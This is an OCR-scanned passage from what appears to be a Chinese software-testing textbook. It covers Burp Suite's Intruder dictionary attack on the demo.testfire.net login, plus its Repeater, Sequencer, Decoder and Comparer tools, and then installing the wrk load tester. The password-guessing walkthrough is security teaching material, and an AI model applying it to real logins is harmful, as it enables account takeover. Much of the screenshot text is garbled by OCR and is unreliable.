用 户 也 可 以 新 建 一 些 规则 对 负载 集合 中 的 值 进行 预 处 理 ,例如 加 前 级 ,如 图 19-27 所 
示 。 还 可 以 选择 是 否 对 特殊 集合 进行 编码 。 
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Payload Sets 


You can define one or more payload sets. The number of payload sets depends on the attack type defined in the 
Positions tab. Various payload types are available for each payload set, and each payload type can be customized 
in different ways. 


Pede E B "sene s 
Payload type: | Simple list. B Request count: 10 





(2) Payload Options [Simple list] 
This payload type lets you configure a simple list of strings that are used as payloads. 


Paste | | admin 








Add Enter a new item 


| Add from list ... [Pro version only] ij 























Kd 19-26 设置 Payloads 界面 1 









图 Payload Processing 


You can defne rules to perform various proc: (E) Eer me ota orme E, 
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图 Payload Encoding 











图 19-27 预 处 理 与 编码 


(10) 同样 设置 Payload set 的 值 为 2, 单 击 Load 按钮 加 载 一 个 包含 密码 的 文件 (自己 准 
备 )。 加 载 之 后 如 图 19-28 所 示 。 

(OD 设置 完成 后 ,进入 Options 子 选项 卡 ,确保 Attack Results 下 的 Store requests 和 
Store responses 已 经 选中 ,如 图 19-29 所 示 。 

(12) 单 击 左上 角 的 Intruder 菜单 ,选择 Start attack 命令 开始 攻击 ,如 图 19-30 所 示 。 
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Ki Burp Suite Free Edition v1.6 = = ami 


























图 Payload Sets q 


You can define one or more payload sets. The number of payload sets depends on the attack type defined in the Positions tab. Various 
payload types are available for each payload set, and each payload type can be customized in different ways. 


Payload set: [2 Payload count: 7 


Payload type: | Simple list jJ Request count: 35 





(2) Payload Options [Simple list] 
This payload type lets you configure a simple list of strings that are used as payloads. 














Í Add | | Entera new item | 


Add from list ... [Pro version only] ij 
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Throttle (milliseconds): & Fixed 0 

@ Variable: stan [Ü step 30000 
Start time: (9) Immediately 

Qin [10 minutes. 

© Paused 





(2) Attack Results 
These settings control what information is captured in attack results. 





国 Make unmodified baseline request 
E Use denial-of-service mode (no results) 
[J Store full payloads 

















图 19-29 B Results 界面 
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Ta Send to Repeater 











i 
i 
i 
9 





Configure predefined payload lists [Pro version only] 
@ Paused 











Attack Results 
These settings control what information is captured in attack results. 





[SI 





国 Store requests 

ËJ) Store responses. 

国 Make unmodised baseline request 

E Use denial-of-service mode (no results) 
E Store full payloads 


图 19-30 开始 攻击 


19.7.2 字典 攻击 结果 


进行 字典 攻击 后 ,弹出 一 个 Windows 窗口 ,其 中 有 制作 好 的 所 有 请 求 。 

用 户 如 何 确定 哪 一 个 登录 请 求 是 成 功 的 呢 ? 一 个 成 功 的 请 求 相 比 不 成 功 的 有 一 个 不 同 
的 响应 状态 。 在 这 种 情况 下 ,用户 看 到 的 用 户 名 admin, i admin 和 用 户 名 jsmith、 密 码 
demol234 的 响应 长 度 相 比 很 接近 , 且 同 其 他 请 求 相 比 相差 很 远 , 则 可 以 把 (admin,admin) 
拿 出 来 进行 试 登录 ,如 图 19-31 Bros ,登录 成 功 。 
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图 19-31 字典 攻击 结果 界面 
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经 过 这 样 的 操作 ,用 户 就 找到 了 该 网 站 的 另 一 个 用 户 名 和 密码 。 这 里 加 载 的 用 户 名 和 
密码 的 文件 是 由 用 户 自己 准备 的 。 可 以 从 网 上 下 载 字 典 文件 ,生成 更 多 的 用 户 名 字典 和 密 
码 字 典 ,帮助 破解 。 同 样 地 ,如 果 知道 用 户 名 ,但 不 知道 密码 ,就 需要 将 密码 作为 一 个 参数 进 
行 破解 。 


19.8 Repeater 工具 


Burp Repeater 可 以 帮助 用 户 有 效 地 进行 手动 测试 。 选 择 好 需要 修改 的 请 求 , 右 击 并 选 
FE Send to Repeater 命令 ,可 将 需要 修改 的 请 求 发 送 到 Repeater 模块 ,如 图 19-32 所 示 。 


He 


intercept WebSockets history | Options. 








Fiter. Hiding CSS, image and general binary content 
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图 19-32 发 送 到 Repeater 


切换 到 Repeater 选项 卡 后 ,用 户 可 以 手动 修改 请 求 。 在 界面 底 端 有 过 滤 功 能 ,能 高 亮 
显示 用 户 输 入 的 内 容 , 如 图 19-33 所 示 。 
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图 19-33 修改 和 过 滤 功 能 
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修改 完成 后 单 击 Go 按钮 ,在 右边 的 窗口 能 够 看 到 响应 报 文 ,如 图 19-34 所 示 。 
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图 19-34 响应 报 文 


19.9 Sequencer 工具 


Burp Sequencer 是 一 款 用 来 测试 会 话 令 牌 随机 性 的 工具 , 它 基于 统计 学 中 的 假设 检验 。 
在 这 里 不 对 其 原理 进行 详细 介绍 ,有 兴趣 的 读者 可 以 参见 帮助 文档 。 

下 面 给 出 一 个 用 Sequencer 攻击 来 测试 的 实例 。 启 用 Burp 拦截 功能 ,重启 浏览 器 (为 
了 让 服务 器 生成 一 个 SessionID) ,在 地 址 栏 输入 demo. testfire. net. fE HTTP history 子 选 
项 卡 中 找到 记录 ,选中 并 右 击 选 择 Send to Sequencer 命令 ,如 图 19-35 所 示 。 
































图 19-35 ”发送 到 Sequencer 
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切换 到 Sequencer 选项 卡 后 单 击 Start live capture 按钮 (有 时 需要 配置 ,选择 要 测试 的 
项 ,这 里 不 需要 ) ,就 能 开始 获得 随机 数据 ,如 图 19-36 所 示 。 当 然 , 用 户 可 以 手动 上 传 测试 
数据 ,或 者 设置 分 析 选 项 。 











Target | Proxy | Spider | Scanner | Intruder | Repeater | Seq Decoder | Comparer | Extender | Options | Alerts. 





Manualload | Analysis options. 





(2) Select Live Capture Request 
Send requests here from other tools to configure a ive capture. Select the request to use, configure the other options below, then 


























(2) Token Location Within Response 
Select the location in the response where the token appears. 


@ Cookie:  ASP.NET_Sessionki=ut1svxvj0up4vqbg1vbpuujo inj 


@ Form field | izj 
© Custom location: Configure. 
19-36 ”捕获 配置 界面 


单 击 Start live capture 按钮 后 会 弹出 如 图 19-37 所 示 的 界面 , 待 请 求 数 超过 100 就 能 
开始 分 析 。 当 然 , 请 求 数目 越 多 ,分 析 的 结果 越 准确 。 

















图 Live capture (130 tokens) 


[re jJ Copy tokens. (Ü Auto analyze (next 200) ^ Requests: 130 


- 一 一 一 一 一 — 





























图 19-37 ”捕获 时 的 界面 


单 击 Analyze now 按钮 ,程序 开始 分 析 , 用 户 会 看 到 相应 的 结果 ,如 图 19-38 所 示 。 系 
统 会 进行 不 同 层次 的 分 析 , 可 以 单 击 相应 的 选项 卡 进行 切换 。 
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(2) Live capture (paused) [ESSEN] 
Resume Copy tokens CJ Auto analyze (next: 2000) Requests: 1680 


Lose J [ savetokens | | Anayzenow — | er o 











| summ, | cnaractersevet anaysis [ Btsevei anaiysis | Anayss options | 








Significance level 
>01% 
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Number of bits of entropy. 
Reliability 
he analysis is based on a sample of 1680 tokens. Based on the sample size, the of the results i: reasonable. 





图 19-38 分析 结果 界面 
19.10 Decoder 工具 


Burp Decoder 工具 可 以 用 来 编码 和 解码 ,可 以 以 文本 和 十 六 进 制 两 种 方式 显示 。 初 始 
界面 如 图 19-39 所 示 。 
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图 19-39 ”初始 界面 


将 待 编码 内 容 输入 到 文本 框 , 然 后 在 Encode as 下 拉 列 表 框 中 选择 相应 的 编码 ,以 将 & 
编码 成 HTML 为 例 , 图 19-40 显示 了 编码 结果 。 

将 上 述 内 容 解码 ,在 Decode as 下 拉 列 表 框 中 选择 ,或 者 直接 单 击 Smart decode T fill. 
结果 如 图 19-41 所 示 。 
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Target | Proxy | Spider | Scanner | ntruaer | Repeater | Sequencer Comparer | Extender | optons | Aerts 





























图 19-40 ”编码 结果 




















图 19-41 解码 结果 
19.11 Comparer 工具 


Burp Comparer 能 够 帮助 用 户 找 出 两 份 数据 之 间 的 不 同 。 用 户 将 需要 比较 的 文件 上 传 
或 者 粘贴 到 对 应 的 区 域内 ,该 工具 将 自动 复制 一 组 数据 样本 ,用户 可 以 从 两 个 数据 样本 中 选 
择 需 要 进行 比较 的 数据 。 单 击 Compare 下 面 的 Words 或 者 Bytes 按钮 ,从 不 同 层面 开始 比 
较 , 如 图 19-42 所 示 。 


Comparer 图 


Tia eco a you dea wort orbi velconparon been dirt di Yos can d, paste, rend dire Fm br oc end hon edet pa compran yo wart to perm 
seawmi 

. Length Data Paste 

s E wes Securty [oam] 
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最 终结 果 会 以 不 同 的 颜色 显示 出 各 种 类 型 的 变化 。 橙 色 代表 修改 ,黄色 代表 添加 , 蓝 色 
代表 删除 。 显 示 结 果 也 可 以 在 文本 和 十 六 进 制 之 间 切 换 , 如 图 19-43 所 示 。 
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图 19-43 ”比较 结果 
DS 专家 点 评 


Burp Suite 界面 友好 ,功能 强大 。 它 所 包含 的 各 个 工作 模块 紧密 结合 ,构成 一 个 完整 的 
工作 流 。 用 户 可 以 用 Proxy 工具 拦截 请 求 和 响应 ; 用 Spider 工具 爬 取 应 用 的 内 容 和 功能 ; 
用 Scanner 工具 进行 两 种 模式 的 漏洞 扫描 ; 用 Intruder 工具 进行 用 户 名 和 密码 的 猜 解 ; 用 
Repeater 工具 进行 手动 攻击 ; 用 Sequencer 工具 进行 会 话 令 牌 随机 性 的 检测 。 除 此 之 外 ， 
该 工具 包 还 自 带 解码 器 和 比较 器 ,能 够 给 用 户 的 测试 提供 很 大 的 便利 。 

Burp Suite 在 使 用 之 前 要 进行 代理 配置 。 首 先 要 配置 Burp 为 代理 服务 器 ,如 果 要 用 
Burp 进行 请 求 和 响应 的 拦截 ,还 要 对 浏览 器 进行 配置 。 

Burp Suite 最 强大 的 两 个 功能 是 Scanner 和 Intruder。 虽 然 可 以 将 Scanner 当成 一 个 
自动 扫描 漏洞 的 工具 来 使 用 ,但 是 这 种 使 用 方式 有 很 多 弊端 ,所 以 不 被 推荐 。 用 户 应 该 考虑 
将 该 工具 用 在 Burp Suite 以 用 户 驱 动 的 方式 来 使 用 。 它 支持 主动 扫描 和 被 动 扫描 两 种 方 
A, Intruder 能 够 帮助 用 户 方便 破解 用 户 名 或 者 密码 ,支持 字典 攻击 和 暴力 破解 等 。 
Intruder 还 设置 了 4 个 攻击 模式 ,可 供用 户 按 需 选 择 , 另 外 还 设置 了 字典 预 处 理 等 强大 的 
功能 。 

Burp Suite 是 一 个 功能 非常 强大 的 套件 ,要 将 它 用 得 熟练 ,本 实验 的 内 容 是 远 远 不 够 
的 。 如 果 使 用 者 对 该 工具 的 某 些 细节 还 是 不 太 清 楚 , 可 以 查看 帮助 页 面 或 者 官方 网 站 。 该 
工具 的 文档 非常 齐全 ,对 用 户 有 很 大 的 帮助 。 


i 拓展 训练 


使 用 Burp Suite 工具 对 本 书 实验 1 中 提供 的 网 站 进行 安全 渗透 测试 ,并 分 析 结 果 。 
提醒 : 可 以 在 http://books. roqisoft. com/wstool 中 查阅 更 多 的 Web 安全 扫描 与 渗透 
攻击 工具 的 使 用 。 
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Ë 
读书 笔记 


ae 


读书 笔记 Name: Date: 








励志 名 句 : The reason why a great man is great is that he resolves to be a 


great man. 





伟人 之 所 以 伟大 ,是 因为 他 立志 要 成 为 伟大 的 人 。 
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Ezan ) 

性 能 测试 是 通过 自动 化 的 测试 工具 模拟 多 种 正常 .峰值 及 异 
常 负载 条 件 来 对 系统 的 各 项 性 能 指标 进行 测试 。 负 载 测试 和 压 
力 测试 都 属于 性 能 测试 ,两 者 可 以 结合 进行 。 通 过 负载 测试 , 确 
定 在 各 种 工作 负载 下 系统 的 性 能 ,目标 是 测试 当 负 载 逐 渐 增加 
时 ,系统 各 项 性 能 指标 的 变化 情况 。 压 力 测 试 是 通过 确定 一 个 系 
统 的 瓶颈 或 者 不 能 接受 的 性 能 点 ,来 获得 系统 能 提供 的 最 大 服务 
级 别 的 测试 。 

-个 系统 真正 上 线 前 一 定 要 经 过 多 轮 性 能 测试 ,确认 没有 性 能 问 
题 再 上 线 ,和 否则 可 能 很 快 出 现 系统 崩溃 现象 。 


20.1 性 能 测试 工具 


工具 原 指 工作 时 所 需 用 的 器 具 , 后 引申 为 达到 、 完 成 或 促进 某 
-事物 的 手段 。 从 人 类 进化 的 角度 来 看 ,会 制造 并 使 用 工具 是 人 和 
猿 最 根本 的 区 别 , 如 图 20-1 所 示 。 工 具 可 以 帮助 人 类 提高 生产 力 


t E 


图 20-1 人 和 猿 最 根本 的 区 别 


如 果 不 使 用 工具 , 仅 靠 人 工 进行 性 能 测试 会 存在 以 下 整 端 。 
CD 测试 需要 投入 大 量 的 资源 。 为 了 模拟 多 种 负载 .并 发 的 场景 
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需要 多 人 协同 工作 ,通常 测试 没有 很 多 的 资源 ,而且 就 算 有 资源 人 工 的 效果 也 会 大 打折 扣 ， 
甚至 某 些 场景 仅 赁 人工 是 无 法 完成 的 。 

(2) 可 重复 性 非常 差 。 性 能 测试 经 常 需 要 反复 调 优 和 测试 执行 ,如 果 没 有 工具 的 帮助 ， 
全 靠 人 工 实在 不 敢 想象 。 

(3) 测试 准确 性 较 差 。 由 于 需要 模拟 多 种 负载 和 并 发 场景 ,如 果 由 人 工 来 操作 ,难免 会 
存在 误差 ,而 且 相 对 工具 或 程序 来 说 这 种 误差 会 更 大 ,对 测试 结果 影响 也 非常 大 。 

(4) 结果 的 收集 、 整 理 和 呈现 形式 差 。 如 果 没 有 工具 ,全 赁 人工 采集 数据 也 会 存在 较 大 


20.1.1 性 能 测试 和 性 能 测试 工具 的 关系 


(1) 性 能 测试 从 测试 阶段 来 划分 属于 系统 测试 ,和 具体 使 用 什么 工具 并 没有 直接 的 关 
系 。 使 用 工具 只 是 为 了 提高 性 能 测试 效率 和 准确 性 的 一 种 方法 和 手段 。 从 本 质 上 来 看 , 同 
做 其 他 事情 时 使 用 工具 没有 什么 实质 性 的 区 别 。 

(2) 性 能 测试 不 等 于 性 能 测试 工具 ,如 LoadRunner 只 是 性 能 测试 工具 中 的 一 种 ,而 且 
它 也 不 是 万 能 的 ,在 某 些 情 况 下 它 并 不 能 派 上 用 场 。 

(3) 自动 化 测试 工具 与 性 能 测试 工具 的 区 别 : 性 能 测试 工具 一 般 是 基于 通信 协议 的 
(客户 器 与 服务 器 交换 信息 所 遵守 的 约定 ) , 它 可 以 不 关心 系统 的 UI; 而 自动 化 使 用 的 是 对 
象 识别 技术 ,关注 UI 界面 。 自 动 化 无 法 或 很 难 造成 负载 ,但 是 通过 协议 很 容易 。 


20.1.2 性 能 测试 工具 的 选择 


现在 性 能 测试 工具 已 经 被 越 来 越 多 的 测试 工程 师 使 用 ,一 定 要 选择 一 个 适合 项 目的 性 
能 测试 工具 。 目 前 性 能 测试 工具 很 多 ,通常 在 公司 或 项 目 中 选择 任何 工具 都 会 做 一 些 调研 ， 
目的 就 是 选择 适合 公司 或 项 目的 工具 。 性 能 测试 工具 也 不 例外 ,通常 可 以 从 以 下 几 个 方面 
考虑 。 

1. 成 本 方面 

(1) 工具 成 本 。 工 具 通 常 分 为 商业 工具 和 开源 工具 两 种 。 商 业 工 具 通常 功 能 比较 强 
大 ,但 是 需要 收费 ,由 于 收费 所 以 可 提供 售后 服务 ,如 果 出 了 问题 有 专业 人 士 帮忙 处 理 。 
而 开源 工具 通常 是 免费 的 ,功能 有 限 ,维护 工具 的 组 织 也 是 自发 的 ,所 以 如 果 碰 到 问题 需 
要 自行 解决 ,没有 专人 提供 服务 。 具 体 选择 商业 工具 还 是 开源 工具 ,需要 根据 公司 的 情 
况 , 比 如 公司 规模 、 愿 意 承 担 的 成 本 、 项 目 综合 情况 等 方面 考虑 。 一 般 来 看 大 公司 通常 可 
以 承担 工具 的 费用 ,会 考虑 购买 商业 工具 。 而 小 公司 由 于 资金 压力 ,可 能 会 选择 开源 
工具 。 

(2) 学 习 成 本 。 使 用 任何 工具 都 需要 学 习 , 这 样 一 来 就 会 产生 学 习 成 本 (如 时 间 ), 因 此 
在 选择 工具 时 也 需要 考虑 到 项 目 组 成 员 的 学 习 成 本 。 如 果 有 两 种 工具 A 和 B 都 能 满足 项 
目 组 测试 的 需求 ,A 工具 大 部 分 人 都 会 使 用 ,而 B 工 具 只 有 极 少 部 分 人 会 使 用 ,那么 建议 优 
先 考虑 A 工具 。 通 常 ,测试 人 员 最 好 熟悉 一 款 流 程 的 商业 (性 能 ) 工 具 , 一 款 开 源 (性 能 ) 工 
具 , 还 需要 熟悉 常见 的 (性 能 ) 脚 本 开发 语言 等 ,这 是 基本 要 求 。 
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2. 支持 的 协议 

性 能 测试 通常 跟 协 议 联 系 非常 紧密 ,比如 B/S 系统 通常 使 用 HTTP 协议 进行 客户 端 和 
服务 器 商 的 信息 交换 ,C/S 系统 通常 使 用 Socket 协议 进行 信息 交换 。 在 选择 工具 时 ,需要 
考虑 项 目 使 用 的 协议 。 一 个 测试 工具 能 否 满足 测试 需求 .能 否 达 到 令 人 满意 的 测试 结果 ,是 
选择 测试 工具 要 考虑 的 最 基本 的 问题 。 

3. 生命 力 

现在 的 性 能 测试 工具 非常 多 ,比如 LR、Jmeter 这 类 较 大 众 的 工具 ,网 上 相关 的 资料 非 
常 多 ,但 一 些小 众 工具 可 能 网 上 资料 比较 少 。 如 果 在 工具 使 用 过 程 中 碰 到 比较 环 手 的 问题 ， 
在 寻求 解决 方案 或 帮助 时 ,大 众 的 工具 相对 来 说 比较 有 优势 。 毕 竟 使 用 的 人 越 多 ,资料 越 
多 ,那么 自己 磁 到 的 问题 也 许 是 别人 早 就 碰 到 并 解决 了 的 ; 即使 之 前 没有 人 碰 到 过 ,由 于 使 
用 研究 的 人 多 ,通过 社区 或 论坛 的 帮助 相信 总 会 有 高 手 能 协助 解决 的 。 

4. 跨 平台 

这 一 点 自然 不 必 多 说 ,看 看 Java 为 什么 一 直 这 么 流行 就 知道 了 。 

很 多 书本 中 都 有 LR、Jmeter 这 种 比较 大 众 的 工具 介绍 ,下 面 我 们 选择 一 个 比较 小 型 
的 、 容 易学 习 的 性 能 测试 工具 wrk 来 讲解 。 


20.2 wrk 安装 


wrk 是 一 个 很 简单 的 HTTP 性 能 测试 工具 ,也 可 以 称 为 http benchmark 工具 ,只 有 一 
个 命令 行 ,就 能 做 很 多 基本 的 HTTP 性 能 测试 。 并 且 wrk 是 开源 的 ,代码 在 github 上 ,网 
址 为 https://github. com/wg/wrk。 

说 明 一 点 : wrk 以 前 只 能 运行 在 类 UNIX 的 系统 上 ,比如 Linux, Mac,Solaris 等 。 也 只 
能 在 这 些 系 统 上 编译 ,现在 最 新 的 wrk 已 经 可 以 在 Windows 10 系统 上 使 用 了 。 

下 面 介绍 两 种 系统 环境 下 安装 wrk 的 步骤 。 其 他 系统 安装 可 以 参考 https://github. 


com/ wg/ wrk/wiki, 
20.2.1 在 Archlinux 上 安装 wrk 


使 用 wrk 进行 性 能 测试 ,首先 需要 下 载 wrk 源码 。 访 问 github 网 址 https://github. 
com/wg/wrk, 在 页 面 中 找到 releases, 单 击 releases, WE 20-2 所 示 。 

在 Releases 页 面 单 击 最 新 的 版 本 ,如 图 20-3 所 示 。 

在 最 新 版 本 页 面 中 下 载 源码 , 单 击 Source code(zip) ,如 图 20-4 所 示 。 

源码 下 载 后 解压 ,解压 后 进入 该 文件 夹 wrk-4. 0. 2 进行 编译 。 编 译 操作 为 打开 shell, 
使 用 cd 命令 进入 wrk-4.0.2 文件 夹 ,进入 后 ,使 用 make 命令 进行 编译 。 编 译 过 程 需要 等 
待 几 分 钟 ,过 程 如 图 20-5 所 示 。 

编译 完成 后 ,使 用 . /wrk 命令 检查 是 否 编译 成 功 。 如 果 没 有 编译 成 功 ,使 用 这 个 命令 会 
报错 。 图 20-6 出 现 的 是 wrk 的 帮助 信息 ,所 以 这 里 wrk 是 编译 成 功 的 。 编 译 成 功 后 可 以 
进行 测试 。 

编译 成 功 后 ,将 wrk 文件 复制 到 /usr/bin 文件 夹 中 ,完成 安装 。 
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O Features B s Exp Marketplace Pricing 





Li wg / wrk @ Watch 578 ** Star 14161 
€ Code Issues 51 | Pull requests 30 Projects 0 Wiki Insights 
pers 
[ch Join GitHub today 
GitHub is home to over 20 million developers working together to host and 


review code, manage projects, and build software together. 


Modern HTTP benchmarking tool 


67 commits V 2 branches 19 releases 44 1 contributor j 





Branch: master = | NEW pull request Find file E 
Bl vo update ae, zmalloc & http_parser Latest comm| 
is deps require openssl 1.1.0 

lis scripts add optional delay() script function 

ia src undate ae. zmalloc & httn narser 








图 20-2 在 页 面 中 找到 releases 并 单 击 


lore arketplace 





D wg / wrk C Watch 578  *Stal 


<> Code Issues 51 Pull requests 30 Projects 0 Wiki Insights 


402 = 


Mar 26, 2016 
on A S © 50305ed [zip [tar.gz 


40.1 


on Mar 24, 2015 
i © a209691 [zip ® tar.gz 


4.0.0 


0h Mer 18,2015 © 651c35f Dzip [Dtargz 


312 
© a52c770 Mzip 同 targz 





on Jan 31, 2015 











图 20-3 在 Releases 页 面 单 击 最 新 的 版 本 
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Marketplace 


Pricing 





























E wg / wrk Watch 578 w» Std 
€ Code Issues 51 Pull requests 30 Projects 0 Wiki Insights 
$402 
4.0.2 
© 50305ed 
lË wg tagged this on mar 26, 2016 - 2 commits to master since this tag 
send hostname in TLS SNI extension 
Downloads 
[D Source code (zip) 
[D Source code (tar gz) 
图 20-4 在 最 新 版 本 页 面 中 下 载 源码 
s wwao2 a 
m -— = 
uU uM 
CHANGES deps INSTALL — LICENSE — Makefle NOTICE ob README SCRPTING scrpts sre 
loQLoPC:-/Downlosdslwrk-4 0.2 x 


$ make 
Building LuaJIT. 
make[1]: Entering directory ' 
— Building LuaJIT 2.0.4 === 
make -C src 
make[2]: Entering directory '/home/lo/Downloads/wrk-4.0.2/0bj/LuaJIT-2.0.4/src 
HOSTCC — host/minilua.o 
HOSTLINK host/minilua 
DYNASM —— host/buildvm arch.h 
HOSTCC ost/buildvm.o 
In file included from host/buildvm.c:59:0. 
./../dynasm/dasm x86.h: In function 'dasm put" 
-/. ./ dynasm/dasm xB6.h:207:2: this ‘if’ clause does not guard 
C*p++ — 1 && *p == DASM DISP) mrm ~ n; continue; 


home/1o/D: ads/wrk-4.0.2/0bj/LuaJIT-2.0.4* 


7. ./dynasm/dasm x86.h:207:45: note 
f it is guarded by the ‘if’ 
if C*p++ == 1 && *p == DASM DISP) mrm = n; continue; 


this statement, but the latter is misleadingly indented as i 


HOSTCC — host/buildvm asm.o 





图 20-5 ”使 用 make 命令 进行 编译 





loQLoPC:-/Downlosds/wrk-4.0.2. 
$ ./wrk 
Usage: wrk «options» «url» 

Options 





connections <N> 
--duration — «T» 
threads E 


script 

--header 
latency 
timeout 
version 


Connections to keep open 
Duration of test 
Number of threads to use 


Load Lua pt file 
Add header to request 
Print latency statistics 
Socket/request timeout 
Print version details 


Numeric arguments may include a SI unit (lk, 1M, 
Time arguments may include a time unit (2s, 2m, 2h) 


su 


图 20-6 wrk 帮助 信和 
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图 20-6 中 的 帮助 信息 对 于 新 手 学 习 wrk 是 非常 有 用 的 。-c 参数 表示 connections ( i£ 
接 数 ) ,-d 参数 表示 duration( 时 间 ) ,-t 参数 表示 threads( 线 程 数 ) 。 这 几 个 参数 在 压力 测试 








中 经 常会 用 到 。 


20.2.2 在 Windows 10 上 安装 wrk 








通过 Windows 10 系统 上 Windows Subsystem for Linux Gá H 














HF Linux 的 Windows F 


系统 ) 这 一 特性 ,可 以 在 Windows 10 系统 中 使 用 wrk。 具 体 安装 步骤 如 下 。 


(D 在 Windows 10 系统 中 打开 “开发 者 模式 ”。 
(D 进入 Windows 设置 ,如 图 20-7 所 示 。 




















账户 
e, aF. 同步 
E. Tí. Wd 


[D 


om 
Windows 设置 
系统 设备 网 络 和 Internet. 个 性 化 
显示 、 通 知 、 应 用 、 电 源 ZF. HPV RU Wi-Fi, 飞行 模式 、VPN WB «m we 
Q rl. MA 
AF V K 
时 介 和 语言 轻松 使 用 隐私 
mu. xw. Bs WEA Mone, molum 位 置 . 相机 Wind me, vx ow 





图 20-7 HEA Windows 设置 
© 进入 更 新 和 安全 ,如 图 20-8 所 示 。 


更 新 状态 


你 的 设备 已 安装 最 新 的 更 新 。 上 次 检查 时 间 : 2017/1/16 22:29 














更 新 和 安全 naer 


C Windows 更 新 " 
更 新 历史 记录 


Windows Defender. 


更 新 设置 


将 自动 下 载 并 安装 可 用 更 新 ， 但 通过 按 流星 计 费 的 连接 除外 (在 此 情况 下 会 收费 )。 


更 改 使 用 时 段 


E] 


针对 开发 人 员 高 级 选项 


Moe Waaa IGNES ES? 


了 解 更 多 信息 


图 20-8 进入 更 新 和 安全 
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AN 


© 单 击 “ 针 对 开发 人 员 ”, 如 图 20-9 所 示 。 





9 xm 使 用 开发 人 员 功 能 


查找 设置 














更 新 和 安全 





C Windows 更 新 





9 Windows Defender (9 sinu 
从 你 所 信任 的 其 他 源 (59 工作 区 ) 安 装 应 用 。 

T 备份 

O TS 人 Rat 
° wm 安装 任 何 每 名 的 应 用 和 便 用 高 级 开发 功能 , 
O m= š 

启用 设备 门户 
全 针对 开发 人 员 MER 
A. Windows RUSIFSSE-UI e» 

设备 发 现 


使 USB 连接 和 本 地 网 络 能 找到 你 的 设备 。 


© 





图 20-9 单 击 “ 针 对 开发 人 员 ” 
@ 单 击 “ 开 发 人 员 模 式 ”, 在 弹出 的 对 话 框 中 单 击 “ 是 ”按钮 ,如 图 20-10 所 示 。 

















© zm 使 用 开发 人 员 功能 
mium 这 些 设置 只 用 于 开发 
了 解 更 多 信息 
更 新 和 安全 


O windows 应 用 商店 应 用 
© Windows 更 新 NE Windows KU Eie RAUS 


@ Windows Defender 


(包括 安装 和 运行 Windows 应 用 商店 外 部 提供 的 应 用 ) 可 能 会 让 你 的 设备 
者 会 损 于 你 的 设备 . 





下 备份 
° ws 
O ws 
te, n —s ^ 
Pa Windows 预 和 体验 计划 Ox 
设备 发 现 
使 USB 连接 和 本 地 网 络 能 找到 你 的 设备 。 
e» s 





E 20-10 单 击 “ 开 发 人 员 模 式 ” 


(2) 打开 “适用 于 Linux 的 Windows 子 系统 ”, 在 “启用 和 关闭 Windows 功能 ”中 完成 
以 下 几 步 。 
(D 打开 Windows 设置 ,参见 图 20-7。 
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O 选择 “系统 ”>“ 应 用 和 功能 ”, 如 图 20-11 所 示 。 























em - n x 
@ xu 消息 44.0KB 
Microsoft Corporation 2017/12/77 
ETT p 
our DE oss 267 MB 
king.com 2017/12/7 
系统 
ing 171MB 
D ER 迅 雪 网 络 技术 有 限 公司 2017/11/19 
= 应 用 安装 程序 16.0 KB 
E 应 用 和 功能 Microsoft Corporation 2017/11/16. 
is Bum 邮件 和 日 历 419MB 
Microsoft Corporation 2017/12/7 
ma 语音 录音 机 441 KB 
Microsoft Corporation 2017/10/22 
Ò AER 
照片 278MB 
c» on Microsoft Corporation. 2017/11/1 
UT) minem 
四 “平板 电脑 模式 相关 设置 
rie 程序 和 功能 





图 20-11 选择 “系统 ”一 “应 用 和 功能 ” 
© 单 击 右 侧 底部 的 “程序 和 功能 ”, 打 开 * 程 序 和 功能 ”窗口 ,如 图 20-12 所 示 。 





Gl som - a8 
个 b» nemm o, WA ^ manu vO mmn 2 
— MEREU 
EEC REDNET. AURRE ASMR. Erpa. 

Q9 ARRI Windows DS 
aR- E- @ 
am š xem — ES "n D 
QxostPi sotto 207 nor22 38:MB 11002001 
Bosse 2345 com. 2017/10/22 vig 

Apple Mobile Device Support Apple nc 201/226 403MB 10013 

期 Apple ARES G2 0 Apple mc 2016/12726 159MB 52 
ËJ Apple RREUREIS (64 (0) Apple inc. 2016/1226 178MB 52 
Bonjour. Apple inc. 2016/12726 328MB 3101 
@ Google Chrome Google ine. 2016/12/26 181 MB 550288387 
< cad Apple Inc 2018/12/26 166 MB 61030 
E iTunes Apple Inc. 2016/12726 300MB 125442 
[E Microsc Visual C+ + 2008 Redistributable - x64 90.30 Microsoft Corporation 20/2 130MB 90307294161 
IEÉMicrosc Visual C+ + 2008 Redistributable - x86 9.030.. Microsoft Corporation 207/022 939KB 9030729161 
TE Microsoft Visual C+ + 2010 x64 Redistributable - 100. Microsoft Corporation ao noa 383MB 10040219 
[E Microsol Visual C+ + 2010 x86 Redistributable - 100... Microsoft Corporation zonon 150 MB 10040219 
E Microsoft Visual C+ + 2012 Redistributable (364) - 110... Microsoft Corporation 2017/10/22 205MB 110610300 
M Microsof Visual C+ + 2012 Redistributable (86) - 11.0.. Microsoft Corporation 20v o2 173 MB 110810000 
Ab Mozilla Firefox 57.0 (64 zh-CN) Mozilla 207/18 139MB 570 
Ba Mozila Maintenance Service Mozila zmn zmkb s70 " 


当前 安装 的 程序 “三 大 小 265GB 
a rd 








2012 “程序 和 功能 ”窗口 


CD 单 击 “启用 或 关闭 Windows 功能 ”, 在 弹出 的 对 话 框 中 找到 “适用 于 Linux 的 
Windows 子 系统 并 选中 , 单 击 “ 确 定 ?按钮 ,如 图 20-13 所 示 。 
© 单 击 “ 确 定 ” 按 钮 ,系统 完成 更 新 后 , 单 击 “ 立 即 重新 启动 ”按钮 ,如 图 20-14 所 示 。 
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- B 
DNE I E 
aas KL o x 
© BARRE windows Tnt 启用 或 关闭 Windows 功能 © 
m: ERREUR. RSS. ERIT- RUN. FANREE E-o 
em E. wq asema EA. sma x P ^ 
QoeiPr E xps Bs 可 | 207no22 383 MB 11002001 
Boss smi nome 2077/22 v59 
Apple Mobie Ej Inxmamem 20w6206 —— 403MB 10013 
期 Apple 应 用 程序 支持 | COE m TCPIP RI echo. daytime $) 2016/12/26 159MB 52 
其 Apple EFES | | = OT MAAEEIMUSNMP) 2016/12/26 178 MB 52 
© bonjour a OR Ens 201812726 328MB 3101 
@ Google chome | | = 2: muna 2016/12/26. 381MB 550288387 
aioa Disa [| amens — vere 6102 
wes s Dü ene 2061226 310 MB 125442 
加 Meocohveulc| 2 ETE zonon 110MB 9030729161 
Microso Vimual C+) | OD emo 2017022 939 KB 90307295161 
IE Microsoft Visual C ss 辐 | zorno 183 Me 10040219 
[E Microsoh Visual C+ 20711o122 150 MB 10040219 
MB Microsoft Visual C+ D] w 2070022 205MB 110610000 
M Microsoft Visual cy zonon 173 MB 110610300 
